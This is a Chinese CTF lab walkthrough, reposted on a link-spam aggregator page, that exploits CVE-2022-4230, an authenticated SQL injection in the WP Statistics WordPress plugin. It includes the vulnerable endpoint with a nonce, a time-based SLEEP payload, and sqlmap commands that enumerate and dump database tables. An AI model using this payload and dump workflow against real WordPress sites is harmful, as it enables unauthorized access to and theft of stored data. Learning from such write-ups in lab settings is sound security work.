当前位置: 首页 > news >正文

山东省住房城乡建设厅网站罗源网站建设

山东省住房城乡建设厅网站,罗源网站建设,商洛建设网站,h5商城网站是什么意思目录 靶标介绍 开启靶场 wpscan漏洞介绍 查询数据库表名 查询表中字段名 查询字段下数据 靶标介绍 WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (ad…

目录

靶标介绍

开启靶场

wpscan漏洞介绍

查询数据库表名

查询表中字段名

查询字段下数据


靶标介绍

WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。

开启靶场

开启靶场之后,发现什么都没有,所以我们进行目录扫描,这里我使用的是御剑目录扫描工具

访问 license.txt 无收获,访问 resdme.html 发现以下页面

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/readme.html

点击 login page,发现了一个登录页面

试了用户名和密码是 admin 之后并无发现,左下角有一个“返回到 test”,说明 test 大概率是用户,尝试登录一下

发现登录成功了

wpscan漏洞介绍

根据靶标介绍,这里有插件漏洞,链接:WP Statistics < 13.2.9 – 经过身份验证的 SQLi |CVE 2022-4230 |插件漏洞 (wpscan.com),有兴趣可以了解下

意思大概是这样的:以允许查看WP统计信息的用户身份登录,并通过获取随机数“https://xxx.com/wp-admin/admin-ajax.php?action=rest-nonce”,并在下面的URL中使用它,该URL将延迟5s

首先通过访问,获得随机数(必须要先登录过后台才行)

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=rest-nonce

获得随机数之后,把随机数添加到下面那个 URL 中,访问一下试试,这里就不加“%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR”了,不加这条语句不影响最终结果

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=16139d290f&name=words&search_engine=aaa

访问之后发现了这个页面,然后用 Burp 抓个包吧

把数据包复制到一个文本里,重命名为 test.txt 拖进 kali 桌面,在桌面打开终端使用 sqlmap 工具跑一下

sqlmap -r test.txt --batch --dbs

发现了 wordpress 敏感数据库

查询数据库表名

sqlmap -r test.txt --batch -D wordpress --tables

发现了一个 flag 表

查询表中字段名

sqlmap -r test.txt --batch -D wordpress -T flag --columns

发现字段名是 flag

查询字段下数据

sqlmap -r test.txt --batch -D wordpress -T flag -C flag --dump

发现了 flag

http://www.yayakq.cn/news/909002/

相关文章:

  • 建设执业资格管理中心网站wordpress换域名插件
  • 国际网站群建设方案西宁网站推广
  • 深圳龙华做网站的设计周
  • 怎么做租房网站荆州网站seo
  • 顺企网宁波网站建设微网站模板怎么用
  • 手机版网站建设费用清单云建站源码
  • 西安建设和住房保障局网站首页django网站开发
  • 网站设计的介绍模板设计师网单怎么做
  • 以下属于网站seo的内容是网页美工设计第一步需要做什么
  • 如何提高网站安全凡客家具
  • 佛山 两学一做 网站邯郸做网站多少钱
  • 获得网页源码怎么做网站wordpress的模板修改在哪个文件夹
  • 外包做网站不付尾款公司网站的功能
  • 响应式网站是做列表如何关联网站与网站
  • 网站建设情况自查报告模板手机网站建设公司排名
  • DW做的网站怎么弄兼容性快速优化网站建设
  • 黑龙江省建设厅的网站首页长沙新媒体营销
  • 宣城做w网站的公司贵阳做网络平台的公司
  • 网络服务主要包括哪几项南通网站优化
  • 网络营销外包都选异变网络流程优化四个方法
  • 做直播网站vps可以吗网页制作简单作业
  • 公众号开发网站学的网络工程
  • 网站内页权重邳州网站开发
  • 百度网站收录查询wordpress能进后台进不去首页
  • 如何不花钱开发网站怎么运营一个淘宝店铺
  • 国外可以做推广的网站有哪些哪个做网站平台好
  • 网站开发方案案例怎么自己做刷赞网站
  • 陕西网站制作公司排名怎么做网站点击率监控工具
  • h5链接怎么做仓山区seo引擎优化软件
  • 网站添加备案信息什么是网站开发流程